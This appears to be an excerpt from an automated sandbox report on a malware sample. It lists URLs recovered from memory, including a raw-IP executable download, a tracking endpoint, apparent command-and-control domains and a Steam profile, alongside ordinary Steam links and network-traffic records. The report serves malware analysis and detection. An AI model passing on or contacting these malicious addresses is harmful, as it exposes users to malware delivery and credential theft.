                  Source: XIaCqh1vRm.exe, XIaCqh1vRm.exe, 00000000.00000002.3744603190.0000000000A80000.00000004.00000020.00020000.00000000.sdmp, XIaCqh1vRm.exe, 00000000.00000002.3744603190.0000000000A97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe
                  Source: XIaCqh1vRm.exe, 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE
                  Source: XIaCqh1vRm.exe, 00000000.00000002.3744603190.0000000000A80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exeW
                  Source: XIaCqh1vRm.exe, 00000000.00000003.1349903583.0000000000AB1000.00000004.00000020.00020000.00000000.sdmp, XIaCqh1vRm.exe, 00000000.00000003.1351268166.0000000000AB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                  Source: 3247.tmp.exe, 00000003.00000003.1550918177.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                  Source: 3247.tmp.exe, 00000003.00000003.1550918177.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                  Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                  Source: 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                  Source: 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                  Source: 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                  Source: 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                  Source: 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                  Source: 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                  Source: 3247.tmp.exe, 00000003.00000003.1550218661.0000000000C24000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                  Source: 3247.tmp.exe, 00000003.00000003.1550918177.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                  Source: 3247.tmp.exe, 00000003.00000003.1550218661.0000000000C24000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                  Source: 3247.tmp.exe, 00000003.00000003.1550218661.0000000000C24000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=Cx79WC7T
                  Source: 3247.tmp.exe, 00000003.00000003.1550218661.0000000000C24000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=foEB
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=ImL_uti9QFBw&l=e
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                  Source: 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                  Source: 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                  Source: 3247.tmp.exe, 00000003.00000002.1856236713.0000000000C16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://immureprech.biz/api
                  Source: 3247.tmp.exe, 00000003.00000002.1856236713.0000000000C16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://immureprech.biz/apix
                  Source: 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                  Source: 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                  Source: 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                  Source: 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                  Source: XIaCqh1vRm.exe, 00000000.00000002.3744603190.0000000000A80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/
                  Source: XIaCqh1vRm.exeString found in binary or memory: https://post-to-me.com/track_prt.php?sub=
                  Source: XIaCqh1vRm.exe, 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
                  Source: XIaCqh1vRm.exe, 00000000.00000002.3744603190.0000000000A80000.00000004.00000020.00020000.00000000.sdmp, XIaCqh1vRm.exe, 00000000.00000002.3744603190.0000000000A46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE
                  Source: XIaCqh1vRm.exe, 00000000.00000002.3744603190.0000000000A80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE6
                  Source: XIaCqh1vRm.exe, 00000000.00000002.3744603190.0000000000A80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DEQ
                  Source: XIaCqh1vRm.exe, 00000000.00000002.3744603190.0000000000A46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DEU-c/
                  Source: 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                  Source: 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                  Source: 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                  Source: 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                  Source: 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                  Source: 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                  Source: 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                  Source: 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                  Source: 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                  Source: 3247.tmp.exe, 00000003.00000002.1856295839.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550218661.0000000000C42000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/G
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                  Source: 3247.tmp.exe, 00000003.00000003.1550918177.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                  Source: 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                  Source: 3247.tmp.exe, 00000003.00000002.1856295839.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550218661.0000000000C42000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                  Source: 3247.tmp.exe, 00000003.00000003.1550218661.0000000000C24000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                  Source: 3247.tmp.exe, 00000003.00000003.1550918177.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                  Source: 3247.tmp.exe, 00000003.00000002.1856295839.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550218661.0000000000C42000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900g
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                  Source: 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                  Source: 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                  Source: 3247.tmp.exe, 00000003.00000003.1550829896.0000000000C8B000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550218661.0000000000C42000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
                  Source: 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                  Source: 3247.tmp.exe, 00000003.00000003.1550218661.0000000000C24000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                  Source: 3247.tmp.exe, 00000003.00000002.1856295839.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550218661.0000000000C42000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrathful-jammy.cyou/z
                  Source: 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                  Source: 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                  Source: 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                  Source: 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                  Source: 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                  Source: 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                  Source: unknownHTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.11:49710 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.22.222:443 -> 192.168.2.11:49727 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.11:49739 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.11:49754 version: TLS 1.2
